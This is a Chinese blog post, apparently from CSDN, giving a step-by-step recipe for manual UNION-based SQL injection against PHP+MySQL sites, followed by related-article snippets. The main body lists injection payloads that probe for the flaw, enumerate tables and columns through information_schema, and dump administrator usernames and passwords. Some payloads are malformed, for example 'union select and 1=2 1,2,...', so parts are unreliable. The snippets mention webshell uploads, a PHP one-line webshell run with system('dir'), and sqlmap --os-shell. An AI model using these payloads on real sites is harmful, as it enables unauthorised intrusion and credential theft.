渗透————PHP+MYSQL数据库(上)

最新推荐文章于 2024-06-25 14:46:02 发布
最新推荐文章于 2024-06-25 14:46:02 发布
阅读量1k 收藏
点赞数 1
文章标签: 渗透 php mysql 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/longgerlee/article/details/53140797
版权
SQL简单命令:
        mysql -u username -ppassword -h ip   //进入MYSQL数据库
        show database;  //查看数据库有哪些文件
        select version();  //查看数据库版本
        use admin;     //选择admin数据库
        show tables;  //查看当前数据库有哪些表
        select * from member;  //查看member这张表有什么


注入步骤:
         1,and 1=1       and 1=判断是否存在注入
         2,存在注入 order by 查找表
         3,union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- //两个减号注释,表示语句结束,可有可无。
              //一般默认知道有admin这张表,用语句union select 1,2,3,4,5,6 from admin 但是很多时候需要自己查找,因此需要爆库爆表:union select and 1=2 1,2,3,4,5,6,7,8,9--//需要让它报错,报出关键字如加入and 1=2

mysql注入一般需要收集的信息:
           version()    //版本信息
           database()    //数据库名
           user()      //当前用户,如果当前用户为root,则可不用爆表,用其他攻击
           @@version_compile_os  //操作系统
        
         4,union select and 1=2 1,2,group_concat(table_name),4,5,6,7,8,9,10 from information_schema.tables where table_schema=database   //database是要爆的数据库,且转换为hex,即十六进制数.mysql数据库版本大于5.0,小于5.0版本用其他方法。参数group_concat是爆出数据库下的所有表名
         5,union select and 1=2 1,2,group_concat(column_name),4,5,6,7,8,9,10 from information_schema.columns where column_name=    //等于号后面写爆出的管理表名,且转为hex
         6,此时知道数据库的表名,也大概知道基本结构,则用第三步操作,爆出管理员账号密码:
union select and 1=2 1,2,3,username,5,6,7,8,password,10 from admuse

雲下闲农
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB渗透测试数据库
04-01
PentestDB 1 介绍 本项目用于提供渗透测试的辅助工具、资源文件 1.1 辅助工具 提供轻量级的易扩展的工具,可以快速编写exploit、添加漏洞验证/扫描规则、添加指纹规则、爆破规则等;包含以下功能: Exploit系统。易扩展的exploit系统,能够使用API快速编写exploit,能够批量执行exploit 子域名爆破。爆破子域名,使用域传送、DNS爆破、GoogleHacking进行子域名爆破 C段扫描。C段扫描,支持生成html格式输出文件 服务端应用识别。识别CMS类型、Web服务器、操作系统、WEB中间件等 URI敏感资源爆破。爆破WEB敏感文件,整站备份、配置备份、敏感文件等 社工密码字典生成。根据社工信息生成密码爆破字典 Google Hacking。GoogleHacking,生成URL字典 编解码等功能。支持非常丰富的编解码方式,方便做payload编码 1.2 资源文件 各种渗透测试常用的资源文件,包括各种爆破字典、exploit、webshell、攻击payload等 2 安装 从这里下载最新版本,或使用命令 git clone https://github.com/alpha1e0/pentestdb.git clone到本地 PentestDB支持Windows/Linux/MacOS,需使用python 2.6.x 或 2.7.x运行 2.1 解决lxml依赖 项目中的脚本文件依赖于lxml linux系统一般默认安装lxml,如果没有可通过以下方式安装: pip install lxml apt-get install lxml yum install lxml windows可通过以下方式安装lxml: 到这里找到对应系统的安装包,下载到本地 安装安装包,pip install package.whl 2.2 解决nmap依赖 项目中的C段扫描依赖于nmap扫描器 到这里下载nmap相应版本 在windows下需要设置环境变量,让系统能够找到nmap.exe。 3 使用 3.1 常用脚本 项目中的python脚本提供用有用的渗透辅助功能,根目录下的pen.py为脚本入口,另外script目录下也有其他一些脚本。 3.1.1 Exploit系统 pen.py的exploit子命令提供了exploit模块相关操作,exploit模块是一个轻量级的exploit框架,可以编写各种web漏洞的exploit: 搜索exploit信息 增加、删除、修改exploit信息 执行某个exploit 搜索并批量执行exploit exploit保存在项目根目录下的exploit目录下 例如: # 列举、搜索、注册、更新、删除 pen.py exploit -l pen.py exploit -q appName:joomla pen.py exploit --register exploit pen.py exploit --update cms_joomla_3_4_session_object_injection.py pen.py exploit -d "Joomla 1.5~3.4 session对象注入漏洞exploit" pen.py exploit --detail "Joomla 1.5~3.4 session对象注入漏洞exploit" # 执行exploit pen.py exploit -e cms_joomla_3_4_session_object_injection.py -u http://127.0.0.1:1234 --attack pen.py exploit -s appName:joomla -u http://127.0.0.1:1234 --verify pen.py exploit -s appName:joomla -u @url.txt 注:有关exploit模块的详细信息请参考exploit/readme.md 3.1.2 服务端应用识别 pen.py的service子命令提供了服务端应用识别的功能,能够识别服务器信息,包括: 操作系统 web服务器 web中间件 CMS等 例如: pen.py service http://xxx.com # 开启CMS识别加强模式 pen.py service http://xxx.com --cms 3.1.3 社工密码字典生成 pen.py的password子命令提供了根据社工信息生成密码字典的功能,能够设置不同关键字生成密码字典
渗透————PHP+MYSQL数据库(下)
longger_lee
11-12 543
PHP+MYSQL的web,在5.0版本后注入有所不一样,由于5.0以后的版本自带information_schema.tables数据库,因此相较5.0之前注入简单。在上篇文章简要说明了注入技巧,也有提到过不同权限的注入,本文简要说明root权限及其更高权限下的注入。           1,在收集信息阶段,注入use(),爆出当前用户为root时,有两种方法进行入侵:           
Web渗透php反序列化漏洞
最新发布
WolvenSec的博客
06-25 969
反序列化漏洞(Deserialization Vulnerability)是一种在应用程序处理数据的过程中,因不安全的反序列化操作引发的安全漏洞;反序列化是指将序列化的数据(通常是字节流或字符串)转换回对象的过程,如果反序列化操作未进行适当的验证或消毒,攻击者可以通过精心构造的恶意数据进行攻击,执行任意代码、获取敏感信息、或破坏数据的完整性。本文我们就来探讨一下反序列化漏洞产生的原因和漏洞利用方法。
数据库渗透
qq_35012243的博客
05-18 2057
1.1 快速搭建 discuz 论坛 1.2 使用 kali 下 BurpSuite 对 discuz 后台注入 php 木马 1.3 使用 Cknife“菜函”上传 webshell 木马到网站 1.4 使用 Webshell 查看 mysql 数据库密码并盗取数据库 ** 1.1 快速搭建 discuz 论坛 ** 1.1.1 攻击 思路 想要拿下一台主机 A 的权限: 1、了解一下这个服务器:端口,服务器版本,操作系统版本。找漏洞。 2、拿到对 A 有一定权限的身仹。如果对方是一个 WEB 服务器.
PHPMySQL 渗透笔记
Coisini的博客
05-25 229
渗透PHP+MYSQL站点 TitanRain.Security.Team 教程仅用于群内成...
渗透基础PHP(零散知识点)
qq_52331099的博客
03-29 4016
查询语句:从admin表中查询 select字段 from表名 where条件 and =>要求and 等式两边都成立才成立 or = > 要求or等式两边有一边成立才成立 SQL注入核心: 用户输入的数据被当做代码进行 万能密码 :' or 1 = 1 -- (这是注释的意思) #(警号注释只有mysql数据库专用) 最好的操作: -- qwe and 优先级 比 or 高 现在主流防护: 使用正则表达式 来 过滤 用户传输的数据 【这就是为什么注册密...
PHP实例开发源码——phpaaCMS php文章管理系统 utf-8.zip
12-01
在深入研究132676247307229968这个文件之前,确保你有合适的开发环境,如安装了PHP解释器和MySQL数据库。解压文件后,查看其目录结构和源代码,了解不同文件的作用。此外,阅读并理解控制器、模型、视图、配置文件...
基于PHP的网上书店的设计.zip
03-26
本项目——“基于PHP的网上书店设计”,正是这样一种实现,它结合了PHP编程语言和MySQL数据库系统,构建了一个功能完善的网上购书平台。 **PHP基础** PHP(Hypertext Preprocessor)是一种广泛使用的开源脚本语言,...
information_for_classmates.rar_php信息管理
09-23
在技术实现上,PHP通常与MySQL数据库结合使用,以存储和处理大量用户信息。MySQL是一种关系型数据库管理系统,具备良好的性能和稳定性。在设计数据库时,我们需要创建合适的表结构来存储用户信息,如用户表、班级表...
web渗透测试技巧(下)
10-12
本文深入探讨了Web渗透测试中几种常见的攻击手段——SQL注入和本地文件包含,并提供了具体的利用案例和防御策略。通过理解和应用这些技巧,不仅可以帮助测试人员发现Web应用程序中的安全漏洞,也能为开发者提供重要...
JAVA上百实例源码以及开源项目源代码
09-17
5个目标文件,演示Address EJB的实现,创建一个EJB测试客户端,得到名字上下文,查询jndi名,通过强制转型得到Home接口,getInitialContext()函数返回一个经过初始化的上下文,用client的getHome()函数调用Home接口...
php网站渗透实战_PHP网站安全-漏洞渗透及解决方式—概述
weixin_39992417的博客
12-19 2390
针对PHP的网站主要存在下面几种攻击方式:1、命令注入(Command Injection)2、eval注入(Eval Injection)3、客户端脚本攻击(Script Insertion)4、跨网站脚本攻击(Cross Site Scripting, XSS)5、SQL注入攻击(SQL injection)6、跨网站请求伪造攻击(Cross Site Request Forgeries, C...
web渗透——PHP一句话插入
dongxie_tk的博客
10-20 5084
一句话:     //as是形式参数 位置: 1、模块——模块管理——文件管理器 2、模板——模板管理——标签源码管理 3、、、 进入,选择.PHP文件,插入一句话 使用: 1、在网页上,、、、/dede/ad_add.php?as=system('dir');    //可以显示该目录下的文件、文件大小以及字节数
php+mysql快速渗透
weixin_30908941的博客
05-02 174
1)如何快速寻找站点注入漏洞?2)PHP+MYSQL数据库下快速寻找WEB站点路径? 3)MYSQL LOAD FILE()下读取文件?3)MYSQL INTO OUTFILE下写入PHPSHELL? 简单介绍Mysql注入中用到的一些函数的作用,利用它们可以判断当前用户权限(Root为最高,相当于MSSQL中的SA)、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。1:...
渗透数据库之Sybase
瞎几把学
01-17 922
<br />美国Sybase公司研制的一种关系型数据库系统,是一种典型的UNIX或WindowsNT平台上客户机/服务器环境下的大型数据库系统。 Sybase提供了一套应用程序编程接口和库,可以与非Sybase数据源及服务器集成,允许在多个数据库之间复制数据,适于创建多层应用。系统具有完备的触发器、存储过程、规则以及完整性定义,支持优化查询,具有较好的数据安全性。Sybase通常与SybaseSQLAnywhere用于客户机/服务器环境,前者作为服务器数据库,后者为客户机数据库,采用该公司研制的PowerB
数据库渗透_笔记篇
weixin_43736941的博客
08-07 1454
数据库写入shell 一.可利用sqlmap的–os-shell进行shell写入 利用条件: 存在注入点 要有file_priv权限 知道网站绝对路径 对web目录有写权限 复现过程 1.在centos(ip:172.16.2.240)上搭建漏洞环境sqli-LABS 2.因为写入需要file_priv权限,这里为了实验方便直接连上数据库进行查询,看到为空,说明对目录不做限制。file_priv权限查询如下: show global variables like '%secure%'; 如果为N
4.1.9. 其它
bylfsj的博客
10-31 451
4.1.9. 其它¶ 4.1.9.1. 低精度¶ php中并不是用高精度来存储浮点数,而是用使用 IEEE 754 双精度格式,造成在涉及到浮点数比较的时候可能会出现预期之外的错误。 比如 php -r "var_dump(0.2+0.7==0.9);" 这行代码的输出是 bool(false) 而不是 bool(true)。这在一些情况下可能出现问题。 4.1.9.2. 弱类型¶ 如果使...
渗透数据库基础
十五年游戏主程转渗透之路
03-11 2001
mysql命令,渗透,infornation_schema
PHP基础学习【针对渗透
m0_55854679的博客
12-11 1298
PHP基础教程 PHP属于后端语言,后端的核心在于与数据库交互。 常见的后端语言:ASP、ASPX、PHP、JSP 什么是PHPPHP(超文本预处理器)是一种通用开源脚本语言,是动态语言的一种,动态语言还包括ASP、ASPX、JSP。 PHP语法吸收了C、java、Perl的特点,主要用于web开发领域。 PHP可以将程序嵌入到前端代码(HTML、CSS、JS)执行。 PHP支持几乎所有流行的数据库以及操作系统。 基本语法 PHP头部标记风格 <?php ?> <script
企业人事管理系统设计——MySQL数据库实现
"数据库MySQL数据库应用》期末大作业是一个关于企业人事管理系统的课程设计,包含E-R图、表的设计、视图设计以及系统需求分析、数据保护设计等内容。项目已正式发布,版本1.0,由未知作者完成。报告详细阐述了系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值